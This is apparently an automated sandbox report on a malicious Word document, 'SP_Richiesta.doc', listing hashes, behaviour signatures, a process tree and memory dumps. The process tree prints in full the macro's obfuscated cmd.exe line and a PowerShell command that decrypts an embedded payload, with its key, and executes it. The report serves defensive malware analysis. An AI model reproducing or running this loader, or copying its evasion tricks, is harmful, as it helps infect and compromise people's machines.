Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-04-2024 18:54

General

  • Target

    SP_Richiesta.doc

  • Size

    168KB

  • MD5

    073ea5db2eaf75947b6e9b67e438ef7b

  • SHA1

    15160e89985e0bea3bf3ce725c924fa16f47e15b

  • SHA256

    94c4eb4bf238b5fd68bad8b20829768bffed5e44eec1504c921fff8abe539756

  • SHA512

    0793427fdf97d9a08fa5b8f61d08f67286a77a0f4ce5b1ab03df80516ce88c1974cc7c1dbe16da2d5d8d8f6c45e75782bdd3f2eda77ca12a838bed376b0736d4

  • SSDEEP

    1536:mTNVczHkD9icmT+FFdZ+a9M9KfjJbkLDDQQQ0OXeBq3ni/yv4WY48+g/iXkIVVL5:mTn/iKFBr5Iwe43ntvTOakWLnepO

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SP_Richiesta.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2640
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil & %C^om^S^pEc% %C^om^S^pEc% /V /c set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&set %zpripnwkZCZkaw%=ow&&set %PQtilTRmLWujZMD%=GLVwzzR&&set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&set %aPjAIMOMA%=s&&set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!%QqLYaunoLaRf%!!%LEHbEfzlw%!!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%! "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAeABaAGIAMAB4AEkAWgBvAEEAPQA9AHwANwA1AGYANwA4ADAANABhADcAZgAwADgAOAA1ADAAMAA3AGMANQAzADAAMgBhAGIAYgAyAGMAZAAzADcAMABjAGIAOABmADIAYgAyAGMAMgBkADIAMwBmADIAMQA3AGUAYgAxADAANABlAGEAYgA3ADkAZgBhADcANQA3ADkAMAA4ADIAYQA3ADgAOQA1ADkANgA4AGUAYwA1ADIAZgBkADcAZgBlAGMANQA0AGEAZgA4ADUAMAA5ADcAYwBhAGEAYgA5ADAAYQA1ADQANwBlADIAYwBiADMANAA1ADcANwAyADMAZAA1AGUANwAyADQAOQAyADYAYQAyADUAMAA2ADgAOQA2AGQAYgAyAGQAZQAxAGEAZABiAGQAMwA0ADkAMwA5ADMAMAA5ADEAZABjAGUAMgBkAGMAMgA1AGEAOAAwAGIAOAAyADEANwA2ADgAYgA1AGQAZAA0AGQANgA2AGIAMQA2AGIANQA4ADIANABmADYAZAA1ADgAZgA4ADcAOQA1ADIAMgBkAGIAMgA3ADAAMgBlADUAYQA3ADIAMgBjADEAMwA0ADYAZgAyAGQAZQAyADAANABjAGEAZABkAGUANgBkADcANwBhADAAMQAzAGMAMAAyAGEAMgBmAGYAZABkAGIAMwAzADAANgAyAGMANQA2AGYAOAA4ADYAYwBiADkAOQA3ADUAOABjAGYANABiAGUANwBkAGUAMgA0ADUAOQBlAGEAYwAzADMAMwA0ADAAMgAwADUAMQAwAGUAYQA3ADEANQA0ADAAZQAwADYAYgBmAGQAMwBiADUAMQAyADUAZQA2AGUAMgBhADEAYQA5ADEAZQA2ADIAYwBjADAAMABlADUAYgBiAGIAMgBiADcAZABlAGIAMAAzADYAMAA4ADAAMgBmADcAMABkADIAZABkADUAOAA1ADcAOAA1AGQAMgBlADYANAA5ADMAOABjAGQAZQA0ADkAYQA3AGUAYgAyADEAMwA4AGEAZQAzADkAMQBhADQAYgA1ADAAYwA5AGIAMwBlAGMAMAAxAGUANABlADMAYwBlADQAOQAxAGIAYQBkAGEANAA1AGIAMABkAGQANAAzAGMAZgBkADcANQAyADgAZgAyAGYAYwA3ADYAMwA2ADUANgA5AGEAMgA2ADgANgA4ADIAYwAyAGUAMAAyAGQAZQBhADYAMgA3ADMAYgBjADIANgAyAGUAMABlAGUAYQBlAGUAZABjADYAMABiADEAMgA1AGEAMQA0AGUANQAwADQAYwA5ADQAMQBkADgAYwA3ADcAOABhAGUAMgA1AGUAMQA0ADcAYgAxADgAMQA2AGQAYwAzAGYAZgBiADIAYgAwAGQAYgBlADcANQBmADYAMQBkADIAOAA3ADEAZQA3ADIAMQBkADgAOAAwADkAYQA4AGEAOQAwADkAMAA3ADcANAA1ADUANgA5ADkANgAxAGUAYwA3AGUAZgBiADEANAAxADkANQA0AGEAZgA4ADQANAAwADUAMABmADYANwBkADkAZQAyAGQAZABkADQAZQBlADQAMABlADMAMwA4ADUAZgBlADEAZABmAGUAZAA3ADAAYgAyAGUAYQBiAGEAZABkADUAOQA2ADgAMQA3ADQANQBlAGUAYwA3ADkAYwA0ADEAYwA2ADAAMQBmADcAZAA5AGUANwAyADMAZgBlAGUAYgA0ADQAMwBmADUAZQA0ADcAZAA3ADIANwA1AGMAZQA2ADYAOAA4AGIANwBiADIAYwBkADIAZQBiADQAZQAxAGEAMAAzAGMAOAAwADcAYwBhADcANgA5ADkAOAA0ADMANQAwADgANQBhAGUAYgA5AGEAZQA5AGUAMQBiAGIAMQA3AGUAMQAwAGQAYwBiAGUAYQBjAGYAMQA4ADgAZAA0ADAAZgBjAGUAMQAyADYAMQA4AGQANwAyAGQANgA3ADcAMQA2AGIAMAAwADYAYgBhAGIAOAAxAGUAYQAxADQAMAA5ADkAMgAzADgAOAA5ADYAZgBjADUAMwBhADYAZAAyADgAMQA1ADcAMgA1ADUAMQAwAGQANwAyADYANABiAGUAMwA3AGMAYQAzADMAMABkAGYAYwAyAGYANAA0ADAAMAAxAGYAMgAyADQAZAA4AGEAMwBiAGEAZQBhADQAMwA2AGMAMgAwAGMAYQBhADcAMwAwADAAYQBiADAAMAAwAGEANgA3ADUAMgBkAGMAYwA5AGMANgAzAGUAOQBmADEANQA2ADQANwBiADYAMQA1AGYAOQBiAGIANwBhADMAMAAyADMAYgAxADIAZABmADIAOABmADYANAAxADgAMgAxADQAOAAwAGMAMQBjADIAOQBmADMANQA2AGEAZQBkADkAMgBiADMAMQBiAGUAZgBlADUANQBjADQANwA2AGIANwA5ADcAOAAxADIAZgAwADMAYQBhAGYANgBjAGMAYgA0ADgAYwA4ADMAMQA0ADkANgA3AGQAOABmADUANwAxADAANwAwAGMAMQA2AGMAMAA0ADEAMwBkADYAMwBlADYAYwAyADgAOAA0ADUAYwAzAGYAOABmADMANwA2AGEAMAA1AGMAMQAyADMAMAA4AGQANABmADIAOAA5AGMAOQAwADEAOQAyADcAOAA0ADMAOAAzAGIAOAAzADIAMgBjADgAMgBjADkAZAAxAGEAMQA0AGIAYgBjAGEANQBiADUAOABlADEANQBlADMAYgAzAGIANABlAGEANQBhAGEAZABiAGUAMgBmADUAZQBhADEANwBjADgAOQBjADQAYgA5ADYANgA5ADIAYgAzADAAYwA1ADYAOABiAGUAYQAyADkANQBmAGMAZAAzAGEAZAA5AGQAMAA3ADAAOQAwADAAMgBhADkAMgA2ADcAOQAxAGEANQBkADEAMwAzAGYAOQA5ADIANgBiAGYAYgBkAGQAYgA2ADgAZAAyADYANAAzAGUAZQA1ADIAMwBlADYAMQBjAGIAYgA4ADMAMwAyADMAZQBiADkAMgBmAGEAZABkAGMAMgA1ADgAMgAwADkAYQAzAGMAYQBlADgANAAzADgAYgA2AGEAMwBiADMANwA5ADYANwBjAGMAMwA0AGUAZQBiADcAMwA2ADcAOAA4ADAANwA1AGEAMwBlADQAZgA4AGUAOABlADUAZABkADQAZgA1ADAANgAzADUAMAA5ADEAZgBkADgAYQA3ADAANwBmAGUAMgBlADAAYwBhADgAYQA0ADgAMQA3ADkANQBkADAAMwAzADcANABiAGMAMwA4AGEAOQBhADIAZQA4ADIAYwAyAGYAYQA0ADcAZABiADUANQA2AGYAZQAxADMANwAzADMAMQBlADUAOAA1ADUANAA3ADMAMgBjAGQAZQBiADAAZAA4ADcAYgA0ADAAYgAxAGMAYQAyADIANgBkAGMANABmADcAMgA3ADkAZQAxADcAZgBhADEANAAzADMAYQA5ADIAMAAzADIAZgAyADgAZgAwADgAMABjADIANAAwADYAMgA2AGQAZgAxADkAMQA4AGUAMwAxAGUAMAA5AGEANwBlAGYAOABiADIAZABiADUAZQBjAGEAYQBiADIANAAyADIAMwA5AGUAYgA2AGEAYwBhAGYAMwA1ADQAOAA1ADUAYgBkAGQAMAAxADYAYgBjADYAMQA3AGYAZAA3ADUAYQAyAGUANAA3AGQAYwBiAGUAMgBmADcAZgBjADUAMQA4ADkAZgBmAGYAOAA0ADAAZAA4AGIAYwA2ADcAZgAxADYANgBkADIAZQAwADYAMwBiADUAMQBlADUAZgBhADMANQAyAGYAMwBjADEANQBhAGUAOABkAGEANwA0ADIANABjADAANwAyAGMAYQA4ADEAYgA0AGUAYwA3AGUAMgA0ADAAYwAwADIAOQA5ADUAOABiAGMANwA0ADcAMAAwADYAMAA3AGEAYgAwADkAOABiADgAMwA2ADIAYwA2ADkAMAA1AGQAMQBjAGMAMwA3ADYANAA5ADkAYgA5ADUAOQAwAGUAZgBjADAAZABmADEAMgBmADQAMgA5ADIAYwBiADEAZgAyADcAOAAxADAANAAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIANAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,244,26,241,36,138,128,131)) ) ) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAeABaAGIAMAB4AEkAWgBvAEEAPQA9AHwANwA1AGYANwA4ADAANABhADcAZgAwADgAOAA1ADAAMAA3AGMANQAzADAAMgBhAGIAYgAyAGMAZAAzADcAMABjAGIAOABmADIAYgAyAGMAMgBkADIAMwBmADIAMQA3AGUAYgAxADAANABlAGEAYgA3ADkAZgBhADcANQA3ADkAMAA4ADIAYQA3ADgAOQA1ADkANgA4AGUAYwA1ADIAZgBkADcAZgBlAGMANQA0AGEAZgA4ADUAMAA5ADcAYwBhAGEAYgA5ADAAYQA1ADQANwBlADIAYwBiADMANAA1ADcANwAyADMAZAA1AGUANwAyADQAOQAyADYAYQAyADUAMAA2ADgAOQA2AGQAYgAyAGQAZQAxAGEAZABiAGQAMwA0ADkAMwA5ADMAMAA5ADEAZABjAGUAMgBkAGMAMgA1AGEAOAAwAGIAOAAyADEANwA2ADgAYgA1AGQAZAA0AGQANgA2AGIAMQA2AGIANQA4ADIANABmADYAZAA1ADgAZgA4ADcAOQA1ADIAMgBkAGIAMgA3ADAAMgBlADUAYQA3ADIAMgBjADEAMwA0ADYAZgAyAGQAZQAyADAANABjAGEAZABkAGUANgBkADcANwBhADAAMQAzAGMAMAAyAGEAMgBmAGYAZABkAGIAMwAzADAANgAyAGMANQA2AGYAOAA4ADYAYwBiADkAOQA3ADUAOABjAGYANABiAGUANwBkAGUAMgA0ADUAOQBlAGEAYwAzADMAMwA0ADAAMgAwADUAMQAwAGUAYQA3ADEANQA0ADAAZQAwADYAYgBmAGQAMwBiADUAMQAyADUAZQA2AGUAMgBhADEAYQA5ADEAZQA2ADIAYwBjADAAMABlADUAYgBiAGIAMgBiADcAZABlAGIAMAAzADYAMAA4ADAAMgBmADcAMABkADIAZABkADUAOAA1ADcAOAA1AGQAMgBlADYANAA5ADMAOABjAGQAZQA0ADkAYQA3AGUAYgAyADEAMwA4AGEAZQAzADkAMQBhADQAYgA1ADAAYwA5AGIAMwBlAGMAMAAxAGUANABlADMAYwBlADQAOQAxAGIAYQBkAGEANAA1AGIAMABkAGQANAAzAGMAZgBkADcANQAyADgAZgAyAGYAYwA3ADYAMwA2ADUANgA5AGEAMgA2ADgANgA4ADIAYwAyAGUAMAAyAGQAZQBhADYAMgA3ADMAYgBjADIANgAyAGUAMABlAGUAYQBlAGUAZABjADYAMABiADEAMgA1AGEAMQA0AGUANQAwADQAYwA5ADQAMQBkADgAYwA3ADcAOABhAGUAMgA1AGUAMQA0ADcAYgAxADgAMQA2AGQAYwAzAGYAZgBiADIAYgAwAGQAYgBlADcANQBmADYAMQBkADIAOAA3ADEAZQA3ADIAMQBkADgAOAAwADkAYQA4AGEAOQAwADkAMAA3ADcANAA1ADUANgA5ADkANgAxAGUAYwA3AGUAZgBiADEANAAxADkANQA0AGEAZgA4ADQANAAwADUAMABmADYANwBkADkAZQAyAGQAZABkADQAZQBlADQAMABlADMAMwA4ADUAZgBlADEAZABmAGUAZAA3ADAAYgAyAGUAYQBiAGEAZABkADUAOQA2ADgAMQA3ADQANQBlAGUAYwA3ADkAYwA0ADEAYwA2ADAAMQBmADcAZAA5AGUANwAyADMAZgBlAGUAYgA0ADQAMwBmADUAZQA0ADcAZAA3ADIANwA1AGMAZQA2ADYAOAA4AGIANwBiADIAYwBkADIAZQBiADQAZQAxAGEAMAAzAGMAOAAwADcAYwBhADcANgA5ADkAOAA0ADMANQAwADgANQBhAGUAYgA5AGEAZQA5AGUAMQBiAGIAMQA3AGUAMQAwAGQAYwBiAGUAYQBjAGYAMQA4ADgAZAA0ADAAZgBjAGUAMQAyADYAMQA4AGQANwAyAGQANgA3ADcAMQA2AGIAMAAwADYAYgBhAGIAOAAxAGUAYQAxADQAMAA5ADkAMgAzADgAOAA5ADYAZgBjADUAMwBhADYAZAAyADgAMQA1ADcAMgA1ADUAMQAwAGQANwAyADYANABiAGUAMwA3AGMAYQAzADMAMABkAGYAYwAyAGYANAA0ADAAMAAxAGYAMgAyADQAZAA4AGEAMwBiAGEAZQBhADQAMwA2AGMAMgAwAGMAYQBhADcAMwAwADAAYQBiADAAMAAwAGEANgA3ADUAMgBkAGMAYwA5AGMANgAzAGUAOQBmADEANQA2ADQANwBiADYAMQA1AGYAOQBiAGIANwBhADMAMAAyADMAYgAxADIAZABmADIAOABmADYANAAxADgAMgAxADQAOAAwAGMAMQBjADIAOQBmADMANQA2AGEAZQBkADkAMgBiADMAMQBiAGUAZgBlADUANQBjADQANwA2AGIANwA5ADcAOAAxADIAZgAwADMAYQBhAGYANgBjAGMAYgA0ADgAYwA4ADMAMQA0ADkANgA3AGQAOABmADUANwAxADAANwAwAGMAMQA2AGMAMAA0ADEAMwBkADYAMwBlADYAYwAyADgAOAA0ADUAYwAzAGYAOABmADMANwA2AGEAMAA1AGMAMQAyADMAMAA4AGQANABmADIAOAA5AGMAOQAwADEAOQAyADcAOAA0ADMAOAAzAGIAOAAzADIAMgBjADgAMgBjADkAZAAxAGEAMQA0AGIAYgBjAGEANQBiADUAOABlADEANQBlADMAYgAzAGIANABlAGEANQBhAGEAZABiAGUAMgBmADUAZQBhADEANwBjADgAOQBjADQAYgA5ADYANgA5ADIAYgAzADAAYwA1ADYAOABiAGUAYQAyADkANQBmAGMAZAAzAGEAZAA5AGQAMAA3ADAAOQAwADAAMgBhADkAMgA2ADcAOQAxAGEANQBkADEAMwAzAGYAOQA5ADIANgBiAGYAYgBkAGQAYgA2ADgAZAAyADYANAAzAGUAZQA1ADIAMwBlADYAMQBjAGIAYgA4ADMAMwAyADMAZQBiADkAMgBmAGEAZABkAGMAMgA1ADgAMgAwADkAYQAzAGMAYQBlADgANAAzADgAYgA2AGEAMwBiADMANwA5ADYANwBjAGMAMwA0AGUAZQBiADcAMwA2ADcAOAA4ADAANwA1AGEAMwBlADQAZgA4AGUAOABlADUAZABkADQAZgA1ADAANgAzADUAMAA5ADEAZgBkADgAYQA3ADAANwBmAGUAMgBlADAAYwBhADgAYQA0ADgAMQA3ADkANQBkADAAMwAzADcANABiAGMAMwA4AGEAOQBhADIAZQA4ADIAYwAyAGYAYQA0ADcAZABiADUANQA2AGYAZQAxADMANwAzADMAMQBlADUAOAA1ADUANAA3ADMAMgBjAGQAZQBiADAAZAA4ADcAYgA0ADAAYgAxAGMAYQAyADIANgBkAGMANABmADcAMgA3ADkAZQAxADcAZgBhADEANAAzADMAYQA5ADIAMAAzADIAZgAyADgAZgAwADgAMABjADIANAAwADYAMgA2AGQAZgAxADkAMQA4AGUAMwAxAGUAMAA5AGEANwBlAGYAOABiADIAZABiADUAZQBjAGEAYQBiADIANAAyADIAMwA5AGUAYgA2AGEAYwBhAGYAMwA1ADQAOAA1ADUAYgBkAGQAMAAxADYAYgBjADYAMQA3AGYAZAA3ADUAYQAyAGUANAA3AGQAYwBiAGUAMgBmADcAZgBjADUAMQA4ADkAZgBmAGYAOAA0ADAAZAA4AGIAYwA2ADcAZgAxADYANgBkADIAZQAwADYAMwBiADUAMQBlADUAZgBhADMANQAyAGYAMwBjADEANQBhAGUAOABkAGEANwA0ADIANABjADAANwAyAGMAYQA4ADEAYgA0AGUAYwA3AGUAMgA0ADAAYwAwADIAOQA5ADUAOABiAGMANwA0ADcAMAAwADYAMAA3AGEAYgAwADkAOABiADgAMwA2ADIAYwA2ADkAMAA1AGQAMQBjAGMAMwA3ADYANAA5ADkAYgA5ADUAOQAwAGUAZgBjADAAZABmADEAMgBmADQAMgA5ADIAYwBiADEAZgAyADcAOAAxADAANAAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIANAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,244,26,241,36,138,128,131)) ) ) )
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      609a3ac09141736eb228dd3b0ed4dce9

      SHA1

      e8affc4ad496b4af667ae11e238dc3a7dbc48a2d

      SHA256

      9e67d79d72e001a1d1ff3aeba32f72ce7a46a4f7702802276e0ef244c5776785

      SHA512

      74f4f64e7ad837cb9ab9d9eb820b74e00d9a0f39eba5c8dbcc203a25b47cdcd58ff04a341f2fd1cb53a11328d186d2f0cc54f3f6d7573edc54e75ac4f01eee06

    • memory/2976-19-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2976-10-0x0000000006330000-0x0000000006430000-memory.dmp

      Filesize

      1024KB

    • memory/2976-27-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-26-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-25-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-24-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-18-0x0000000006330000-0x0000000006430000-memory.dmp

      Filesize

      1024KB

    • memory/2976-53-0x000000007160D000-0x0000000071618000-memory.dmp

      Filesize

      44KB

    • memory/2976-2-0x000000007160D000-0x0000000071618000-memory.dmp

      Filesize

      44KB

    • memory/2976-23-0x0000000006330000-0x0000000006430000-memory.dmp

      Filesize

      1024KB

    • memory/2976-16-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-13-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-14-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-35-0x000000007160D000-0x0000000071618000-memory.dmp

      Filesize

      44KB

    • memory/2976-36-0x0000000006330000-0x0000000006430000-memory.dmp

      Filesize

      1024KB

    • memory/2976-37-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB

    • memory/2976-0-0x000000002FBF1000-0x000000002FBF2000-memory.dmp

      Filesize

      4KB

    • memory/2976-52-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2976-21-0x00000000005D0000-0x00000000006D0000-memory.dmp

      Filesize

      1024KB